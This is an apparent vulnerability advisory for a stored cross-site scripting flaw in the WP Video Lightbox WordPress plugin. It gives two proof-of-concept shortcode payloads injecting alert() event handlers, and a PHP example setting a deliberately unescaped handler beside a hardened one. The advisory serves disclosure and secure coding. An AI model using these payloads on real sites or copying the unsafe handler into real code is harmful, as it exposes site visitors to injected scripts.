wpexploit, Vishnupriya Ilango, WPEX-ID:42A8947F-2AE5-4F12-BD3D-AB3716501DF5
Aug 23, 2021 - 12:00 a.m.

WP Video Lightbox < 1.9.3 - Contributor+ Stored Cross-Site Scripting

EPSS: 0.001 Low, Percentile: 19.4%

The plugin does not escape the attributes of its shortcodes, allowing users with a role as low as contributor to perform Cross-Site Scripting attacks. The two shortcodes below show this through the video_id and anchor attributes:

[video_lightbox_vimeo5 video_id='"onmouseover=alert(/XSS/) b="' width="640" height="480" anchor="Click here to open vimeo video"]

[video_lightbox_vimeo5 video_id="13562192" width="640" height="480" anchor='http"onerror=alert(/XSS/)//']
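
The class of bug described above, next to a hardened handler, as an added example that is not the plugin's own code. The shortcode name `demo_lightbox_vimeo`, both function names, the URL layout and the rule that an anchor starting with http is rendered as an image are assumptions made for illustration.

```php
<?php
// Added illustration: hypothetical handlers, not WP Video Lightbox source code.
// Runs inside WordPress (uses core escaping and shortcode helpers).

function demo_lightbox_defaults( $atts ) {
    return shortcode_atts(
        array( 'video_id' => '', 'width' => '640', 'height' => '480', 'anchor' => '' ),
        $atts
    );
}

// Vulnerable pattern: attribute values are concatenated into markup as-is,
// so a double quote inside video_id or anchor closes the HTML attribute and
// whatever follows is parsed as a new attribute such as an event handler.
function demo_lightbox_unsafe( $atts ) {
    $a    = demo_lightbox_defaults( $atts );
    $href = 'https://vimeo.com/' . $a['video_id'] . '?width=' . $a['width'];
    return '<a rel="lightbox" href="' . $href . '">' . $a['anchor'] . '</a>';
}

// Hardened pattern: validate each attribute against what it is supposed to
// be, then escape it for the exact context it is written into.
function demo_lightbox_safe( $atts ) {
    $a = demo_lightbox_defaults( $atts );

    // A Vimeo ID is numeric; render nothing for any other value.
    if ( ! preg_match( '/^\d+$/', $a['video_id'] ) ) {
        return '';
    }

    $href = add_query_arg(
        array( 'width' => absint( $a['width'] ), 'height' => absint( $a['height'] ) ),
        'https://vimeo.com/' . $a['video_id']
    );

    // Assumption: an anchor starting with http(s) is an image URL, else link text.
    if ( preg_match( '#^https?://#i', $a['anchor'] ) ) {
        $inner = '<img src="' . esc_url( $a['anchor'] ) . '" alt="" />';
    } else {
        $inner = esc_html( $a['anchor'] );
    }

    return '<a rel="lightbox" href="' . esc_url( $href ) . '">' . $inner . '</a>';
}

add_shortcode( 'demo_lightbox_vimeo', 'demo_lightbox_safe' );
```

Contributors cannot post unfiltered HTML, but their shortcode attributes are expanded at render time, which is why the escaping has to happen in the handler's output rather than when the post is saved.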
